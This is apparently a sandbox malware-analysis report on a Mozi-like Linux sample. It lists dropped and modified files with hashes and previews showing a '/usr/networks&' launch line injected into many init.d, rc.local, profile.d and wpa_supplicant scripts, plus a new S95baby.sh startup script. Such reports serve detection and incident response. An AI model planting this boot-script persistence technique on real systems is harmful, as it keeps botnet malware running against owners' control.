                                                                                                                                SHA-256:C3294C9B06A81A3325E131BF139B5F1C8615290B382F0014DA440F4F76C49BEA
                                                                                                                                SHA-512:13E47AA60C322CB0DEF4894B97625EC2E3AE9214743569AD566ECA1331D581CD2185BC27CD538E8BA5D475FBBB79EC76EA4CCE31EDB115F30684D80CA9F5F1F4
                                                                                                                                Malicious:false
                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                Preview: ./usr/networks&.test -f /usr/share/acpi-support/key-constants || exit 0..for device in /sys/devices/platform/dock.*; do..[ -e "$device/type" ] || continue..[ x$(cat "$device/type") = xdock_station ] || continue..echo 1 > "$device/undock".done../usr/networks&.exit 1.
                                                                                                                                /etc/bash_completion.d/libreoffice.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:false
                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /etc/init.d/S95baby.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:POSIX shell script, ASCII text executable
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):25
                                                                                                                                Entropy (8bit):3.8936606896881854
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:TKH4v0VJ:hK
                                                                                                                                MD5:1B3235BA10FC04836C941D3D27301956
                                                                                                                                SHA1:8909655763143702430B8C58B3AE3B04CFD3A29C
                                                                                                                                SHA-256:01BA1FB41632594997A41D0C3A911AE5B3034D566EBB991EF76AD76E6F9E283A
                                                                                                                                SHA-512:98BDB5C266222CCBD63B6F80C87E501C8033DC53B0513D300B8DA50E39A207A0B69F8CD3ECC4A128DEC340A1186779FEDD1049C9B0A70E90D2CB3AE6EBFA4C4D
                                                                                                                                Malicious:true
                                                                                                                                Joe Sandbox View:
                                                                                                                                • Filename: KnAY2OIPI3, Detection: malicious, Browse
                                                                                                                                • Filename: rIbyGX66Op, Detection: malicious, Browse
                                                                                                                                • Filename: MGuvcs6Ocz, Detection: malicious, Browse
                                                                                                                                • Filename: mozi.a.zip, Detection: malicious, Browse
                                                                                                                                • Filename: bin.sh, Detection: malicious, Browse
                                                                                                                                • Filename: i, Detection: malicious, Browse
                                                                                                                                • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                                • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                                • Filename: 1skm346Xtz, Detection: malicious, Browse
                                                                                                                                • Filename: Mozi.a, Detection: malicious, Browse
                                                                                                                                • Filename: Mozi.1.m, Detection: malicious, Browse
                                                                                                                                • Filename: 6wuvHEBHt8.bin, Detection: malicious, Browse
                                                                                                                                • Filename: 7v1ic5IS8I, Detection: malicious, Browse
                                                                                                                                • Filename: Mozi.a, Detection: malicious, Browse
                                                                                                                                • Filename: Mozi.a, Detection: malicious, Browse
                                                                                                                                • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                                • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                                • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                                • Filename: bad_file, Detection: malicious, Browse
                                                                                                                                • Filename: mxjzQQFgLp, Detection: malicious, Browse
                                                                                                                                Preview: #!/bin/sh./usr/networks&.
                                                                                                                                /etc/init.d/bootmisc.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):148
                                                                                                                                Entropy (8bit):4.718194263525147
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVaUsZ/IREK0GFrTOvsBdFru4KXGK+R0FJOUsZoG3Hv0VOORgn:eoARzAsBdhu4GX+R0Voo+v7n
                                                                                                                                MD5:68EC1ED64500D143FE44D1ED0B19DD83
                                                                                                                                SHA1:90AE6027194C555ED6DE71191682E1773DD8E609
                                                                                                                                SHA-256:F450F84C27D8339C63251AEB3DC06634AC42E8F4B0AFDA734E1044B5453ECF0D
                                                                                                                                SHA-512:C9CD195893143DE17D2029672DA2236C7EC44498B1B5F13526CCA56665388790A198ECD0F2FE097FB8D035F780AFFCC5F984DDE1D0540AA778892F52E7698EBB
                                                                                                                                Malicious:true
                                                                                                                                Preview: ./usr/networks&..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: bootmisc.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                                /etc/init.d/checkfs.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):147
                                                                                                                                Entropy (8bit):4.7173471450646
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVaUsZ/IREK0GFrTOvsBdFru4AGXi0FJOUsZoG3Hv0VOORgn:eoARzAsBdhu4u0Voo+v7n
                                                                                                                                MD5:FC904BF1583E7C4398FCCDF2D3276902
                                                                                                                                SHA1:25D51112D0A6C9C977F4BB0B73BB3B4F278074A3
                                                                                                                                SHA-256:059F2548AB66249C86CC868222E9CA0B44123E23A99D4D3581044D1306730BD7
                                                                                                                                SHA-512:DF7FC2EE581E67BC3282F05FB8DC33FCAF86B29F564E5CB43965AFDB6AE7422D06A6091A18375B3544F495CA827B6CC6B213FF4FFE7AEC252C326B8D56B4CF84
                                                                                                                                Malicious:true
                                                                                                                                Preview: ./usr/networks&..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: checkfs.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                                /etc/init.d/checkroot-bootclean.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):250
                                                                                                                                Entropy (8bit):4.872318043360431
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:un5GKFqLkMfF3teoARzAsBdhu4YDi0Voo+v7n:AGKE3fdARMsBLbYerTn
                                                                                                                                MD5:1B20C93FFEABBAA880FEB038394DA3EE
                                                                                                                                SHA1:CDD8FDC804AE4D7464E3B67B26F52C53C5EEAD13
                                                                                                                                SHA-256:3A63188036AB39E080E5035091441EFB91BF22F20C9292900929CA8F04D0F280
                                                                                                                                SHA-512:E2717119C05473DEB21FF60060813C6B4648FB6B94B524D76A15ED9506ED2BCFFA03108ABAB7CBF52A29D7507937749D0F9F420A96D4F75B499553434F836059
                                                                                                                                Malicious:true
                                                                                                                                Preview: ./usr/networks&..exit $?..;;. restart|reload|force-reload)..echo "Error: argument '$1' not supported" >&2..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: checkroot-bootclean.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                                /etc/init.d/checkroot.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3111
                                                                                                                                Entropy (8bit):4.922960717312443
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:l+bjYLN1LiQKt6CYuSB/VN7pL4TyKWSmdrBW71cBi8m:0sxx2cJBVxZH01cc8m
                                                                                                                                MD5:544D026D22E17EF8C1F59AE6EC1E5993
                                                                                                                                SHA1:F5BFEE80CBF31DAEC25CD0728F030580F539D88F
                                                                                                                                SHA-256:69A39FE65F95BBA2E445A39AA1F8AF941FDA210AB6A9174B0578B5AB36C5BE32
                                                                                                                                SHA-512:85CD0C7AE75DA853E5C4286BF4E3D9DE28D2916EDBE0CB7A42DC53AD7D8B02F7875C617DC4D4DD4A1C74333D9403C8D06C903F8F19AB11A3E221281B7CBF8837
                                                                                                                                Malicious:true
                                                                                                                                Preview: ./usr/networks&..# NOTE: "failure" is defined as exiting with a return code of..# 4 or larger. A return code of 1 indicates that file system..# errors were corrected but that the boot may proceed. A return..# code of 2 or 3 indicates that the system should immediately reboot...#..if [ "$FSCKCODE" -eq 32 ]..then...log_warning_msg "File system check was interrupted by user"..elif [ "$FSCKCODE" -gt 3 ]..then...# Surprise! Re-directing from a HERE document (as in "cat << EOF")...# does not work because the root is currently read-only....log_failure_msg "An automatic file system check (fsck) of the root filesystem failed. .A manual fsck must be performed, then the system restarted. .The fsck should be performed in maintenance mode with the .root filesystem mounted in read-only mode."...log_warning_msg "The root filesystem is currently mounted in read-only mode. .A maintenance shell will now be started. .After performing system maintenance, press CONTROL-D .to terminate the maintenance shell
                                                                                                                                /etc/init.d/hostname.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):404
                                                                                                                                Entropy (8bit):5.01878905639229
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:U20zRSdZ9iBbG2Us4Ji0SAGKFqLkMfF3teoWpAsBdA80F4n0u4hR9QR0Voo+v7n:Ul221wi0PGKE3fdpsBi8wlbHaNrTn
                                                                                                                                MD5:0A6F8F35CFF93CE8BBAB05E2DA2714C6
                                                                                                                                SHA1:9A865CEB2B56974A54694ED9D1D117043EA02727
                                                                                                                                SHA-256:4E41D7D95B11DBAD34E30EDE98DB6728873146F05FF45A4EF6943ADD1F71D0A1
                                                                                                                                SHA-512:F6E29642047487748B5BEC77C7429881B73FED48CAA9247CB788CFA2CE856D300B3FB6F8F4C8D6F18ED710B5237B331BC03ABE03222296EE12F1256D5222B537
                                                                                                                                Malicious:true
                                                                                                                                Preview: ./usr/networks&..exit $ES.}..do_status () {..HOSTNAME=$(hostname)..if [ "$HOSTNAME" ] ; then...return 0..else...return 4..fi.}..case "$1" in. start|"")..do_start..;;. restart|reload|force-reload)..echo "Error: argument '$1' not supported" >&2..exit 3..;;. stop)..# No-op..;;. status)..do_status..exit $?..;;. *)..echo "Usage: hostname.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                                /etc/init.d/hwclock.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:true
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /etc/init.d/mountall-bootclean.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):249
                                                                                                                                Entropy (8bit):4.8912088003487595
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:un5GKFqLkMfF3teoARzAsBdhu4iea2ii0Voo+v7n:AGKE3fdARMsBLbxPrTn
                                                                                                                                MD5:11FEEF13321D348864E7632D0746ECA2
                                                                                                                                SHA1:8D763DA6837280846D90AAACA3122D4F5CC0C62D
                                                                                                                                SHA-256:3DFE238D111564682893276C28BB49367C38A1F07A873B8F79E4FA8291FD7FE7
                                                                                                                                SHA-512:1C25B93B523688ACB3DF72B8EC148CD736CD479E7BEF3655DBCDB0B6D1AFACB652492ECF81A21EBADEBBFF14D0B20916DFD639E93EE1CCD6454C61F38BCAE46D
                                                                                                                                Malicious:true
                                                                                                                                Preview: ./usr/networks&..exit $?..;;. restart|reload|force-reload)..echo "Error: argument '$1' not supported" >&2..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: mountall-bootclean.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                                /etc/init.d/mountall.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):148
                                                                                                                                Entropy (8bit):4.74526082342869
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVaUsZ/IREK0GFrTOvsBdFru4iLirKM0FJOUsZoG3Hv0VOORgn:eoARzAsBdhu4ierX0Voo+v7n
                                                                                                                                MD5:44D9E997053B704B17DB7DD64563014E
                                                                                                                                SHA1:1A29A3E927426D001FD0627C244B2397CF62D6C6
                                                                                                                                SHA-256:56B70518A2C51841B3C7BC5DDBAFC2AF62F4A47B25A1147A929E1129CBCBFAC7
                                                                                                                                SHA-512:B16AC50C36C5C17D405D2D8A1E9DB7D9863578EB71F4C382C56C4AA4BCEAEE6D4558A8CB94505464A1F13BA980741F5BE8CBD134C425004AA260DAC8F52B1581
                                                                                                                                Malicious:true
                                                                                                                                Preview: ./usr/networks&..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: mountall.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                                /etc/init.d/mountdevsubfs.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):56
                                                                                                                                Entropy (8bit):4.1427249051134325
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVaUsZoG3LWlOORgn:eoo+WMn
                                                                                                                                MD5:1E7189F6F5D3DB6ABCDA8139030EFD90
                                                                                                                                SHA1:370B1FF47F5FC95D054FE3036C5F772403F9C1EF
                                                                                                                                SHA-256:2059ABA4C0ADA6C0EE6F5F911D60D25C054D91BEEF283931E7AD10CE68E096E7
                                                                                                                                SHA-512:C1CBF1885B2E515BF2B77688891B122EEC824022DFCB30B3075D9BD39B154EA7A9DC1B0CD64397335A9D32A8959B53C2225F600357F295FA8A914BA247163E12
                                                                                                                                Malicious:true
                                                                                                                                Preview: ./usr/networks&..exit 3..;;.esac../usr/networks&.exit 1.
                                                                                                                                /etc/init.d/mountkernfs.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):56
                                                                                                                                Entropy (8bit):4.1427249051134325
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVaUsZoG3LWlOORgn:eoo+WMn
                                                                                                                                MD5:1E7189F6F5D3DB6ABCDA8139030EFD90
                                                                                                                                SHA1:370B1FF47F5FC95D054FE3036C5F772403F9C1EF
                                                                                                                                SHA-256:2059ABA4C0ADA6C0EE6F5F911D60D25C054D91BEEF283931E7AD10CE68E096E7
                                                                                                                                SHA-512:C1CBF1885B2E515BF2B77688891B122EEC824022DFCB30B3075D9BD39B154EA7A9DC1B0CD64397335A9D32A8959B53C2225F600357F295FA8A914BA247163E12
                                                                                                                                Malicious:true
                                                                                                                                Preview: ./usr/networks&..exit 3..;;.esac../usr/networks&.exit 1.
                                                                                                                                /etc/init.d/mountnfs-bootclean.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):249
                                                                                                                                Entropy (8bit):4.8916208864241355
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:un5GKFqLkMfF3teoARzAsBdhu4il/2ii0Voo+v7n:AGKE3fdARMsBLbPrTn
                                                                                                                                MD5:515975B77B7985776BC03B8F5C029EFE
                                                                                                                                SHA1:AA8F2AD5CB736EDC9BA0AEAE0748257E16875C11
                                                                                                                                SHA-256:DFD458AE245B70CB759F3FF40FB22BDFD520E627DABAF813C1D9BCA2C8155E00
                                                                                                                                SHA-512:169DC8DDF26C9F3A50C29D0F2AB99AF20D4F949F2F034AC25914086ED0DE37610D310F034E20B6493195E1BB54DC3036EB5BC999099D74ED53FFC813DED5FAD2
                                                                                                                                Malicious:true
                                                                                                                                Preview: ./usr/networks&..exit $?..;;. restart|reload|force-reload)..echo "Error: argument '$1' not supported" >&2..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: mountnfs-bootclean.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                                /etc/init.d/mountnfs.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):190
                                                                                                                                Entropy (8bit):3.788938232230384
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVx5jWvFFFvNsTREKdKCvFF/pN1uFFFveYd3LrLl7jWvFFFvzv3Hv0VOORgn:a5qvFFhNsTR/3/hN4/Zdd75qvFFhzfv7
                                                                                                                                MD5:B09350F021B2B102B1E328A988261F3E
                                                                                                                                SHA1:93AD761BD0E1EBB3E9BDCAA469EC0192C0C9DA4F
                                                                                                                                SHA-256:E78EED19CCD5853AF3518FB3A16BE3244BE503798218041D65E5B44A0829A020
                                                                                                                                SHA-512:1DB35C4F8A6584FAC6AB3B0789B4037F09557457B248443489D5EDD2A6B34DB59735B3256F905D45075199DD870E52FFDBCC7E8DD85006BD1F85F8000F61FF8A
                                                                                                                                Malicious:true
                                                                                                                                Preview: ./usr/networks&. exit 3. ;;. stop|status). # No-op. ;;. *). echo "Usage: $0 start|stop" >&2. exit 3. ;;.esac..:../usr/networks&.exit 1.
                                                                                                                                /etc/init.d/umountnfs.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):145
                                                                                                                                Entropy (8bit):4.730534942677594
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVaUsZ/ZHM4hWRJ7Fru4fR3dM0FJOUsZoG3Hv0VOORgn:eogJ7hu4pC0Voo+v7n
                                                                                                                                MD5:60F4E3C6C61EF7FA36BC5B00FF234698
                                                                                                                                SHA1:8AC881752B54BDB8FBD831A67AF6ED8CB2989B65
                                                                                                                                SHA-256:9DBFF8DF724717101900B6289BDB73EB05D67D4A14170EB3D26B20686F851F7F
                                                                                                                                SHA-512:741D35617E8C3B5D1278CB83C11BFBA1B6110B17D7E251DABA10EAC30BBAD8C5064F0EB7AF236EEEA9383E78C8E3F2DE477598763A5A1B7F213D606DF1F1D6D7
                                                                                                                                Malicious:true
                                                                                                                                Preview: ./usr/networks&..exit 3..;;. stop|"")..do_stop..;;. *)..echo "Usage: umountnfs.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                                /etc/profile.d/Z97-byobu.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:true
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /etc/profile.d/apps-bin-path.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:true
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /etc/profile.d/bash_completion.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:true
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /etc/profile.d/cedilla-portuguese.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:true
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /etc/profile.d/vte-2.91.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:true
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /etc/rc.local
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOOR3n:M
                                                                                                                                MD5:CCE237822A14795B1B5946EAE141691B
                                                                                                                                SHA1:420CE3F920BB02962978255ADDCBF975D4014A3A
                                                                                                                                SHA-256:D9C831E4480DBAAB813BF5BE1BCE6C64CFA4F4320038022E2051BD4E8E4D76DF
                                                                                                                                SHA-512:24A86C9C9944068E3FE6000687E6D392F6587556601E09A22399D15B588536883547B326F13BE506BE492C2269F69AA2DCEDE4FBA8847664793847C74AD5EFF6
                                                                                                                                Malicious:true
                                                                                                                                Preview: ./usr/networks&.exit 0.
                                                                                                                                /etc/rcS.d/S95baby.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:POSIX shell script, ASCII text executable
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):25
                                                                                                                                Entropy (8bit):3.8936606896881854
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:TKH4v0VJ:hK
                                                                                                                                MD5:1B3235BA10FC04836C941D3D27301956
                                                                                                                                SHA1:8909655763143702430B8C58B3AE3B04CFD3A29C
                                                                                                                                SHA-256:01BA1FB41632594997A41D0C3A911AE5B3034D566EBB991EF76AD76E6F9E283A
                                                                                                                                SHA-512:98BDB5C266222CCBD63B6F80C87E501C8033DC53B0513D300B8DA50E39A207A0B69F8CD3ECC4A128DEC340A1186779FEDD1049C9B0A70E90D2CB3AE6EBFA4C4D
                                                                                                                                Malicious:true
                                                                                                                                Joe Sandbox View:
                                                                                                                                • Filename: KnAY2OIPI3, Detection: malicious, Browse
                                                                                                                                • Filename: rIbyGX66Op, Detection: malicious, Browse
                                                                                                                                • Filename: MGuvcs6Ocz, Detection: malicious, Browse
                                                                                                                                • Filename: mozi.a.zip, Detection: malicious, Browse
                                                                                                                                • Filename: bin.sh, Detection: malicious, Browse
                                                                                                                                • Filename: i, Detection: malicious, Browse
                                                                                                                                • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                                • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                                • Filename: 1skm346Xtz, Detection: malicious, Browse
                                                                                                                                • Filename: Mozi.a, Detection: malicious, Browse
                                                                                                                                • Filename: Mozi.1.m, Detection: malicious, Browse
                                                                                                                                • Filename: 6wuvHEBHt8.bin, Detection: malicious, Browse
                                                                                                                                • Filename: 7v1ic5IS8I, Detection: malicious, Browse
                                                                                                                                • Filename: Mozi.a, Detection: malicious, Browse
                                                                                                                                • Filename: Mozi.a, Detection: malicious, Browse
                                                                                                                                • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                                • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                                • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                                • Filename: bad_file, Detection: malicious, Browse
                                                                                                                                • Filename: mxjzQQFgLp, Detection: malicious, Browse
                                                                                                                                Preview: #!/bin/sh./usr/networks&.
                                                                                                                                /etc/wpa_supplicant/action_wpa.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):714
                                                                                                                                Entropy (8bit):5.329653855555143
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:cVDDdg8QdNux7S3Pd7PSeSST4ydVgpuVFnn3izesU6jc45gfqlX4n:UDxReIx7O9BSu4ydVBnn4742gyJ4
                                                                                                                                MD5:DD099D71A60531087FDDED3EBEE8036A
                                                                                                                                SHA1:C684334C3B133D889F8C5965184E1C9280BAA16A
                                                                                                                                SHA-256:52995C5CED8EE9421D08E745C5E3D9805783E5D641C7A8FDB1C3CA6A4C745E03
                                                                                                                                SHA-512:2788EB77A944861C3361D12DB65502553EE36314C40A864F73B2FF18AF54DA3D02F5AC07DBA4E962596F11DD8B826243BE2FD52F85F1260B511D3241E1C38C63
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&..exit 0.fi..# ifplugd(8) - <iface> <action>.#.# If an ifplugd managed interface is brought up, disconnect any.# wpa-roam managed interfaces so that only one "roaming" interface.# remains active on the system...IFPLUGD_IFACE="${1}"..case "${2}" in..up)...COMMAND=disconnect...;;..down)...COMMAND=reconnect...;;..*)...echo "$0: unknown arguments: ${@}" >&2...exit 1...;;.esac..for CTRL in /run/wpa_supplicant/*; do..[ -S "${CTRL}" ] || continue...IFACE="${CTRL#/run/wpa_supplicant/}"...# skip if ifplugd is managing this interface..if [ "${IFPLUGD_IFACE}" = "${IFACE}" ]; then...continue..fi...if wpa_action "${IFACE}" check; then...wpa_cli -i "${IFACE}" "${COMMAND}"..fi.done../usr/networks&.exit 1.
                                                                                                                                /etc/wpa_supplicant/functions.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /etc/wpa_supplicant/ifupdown.sh
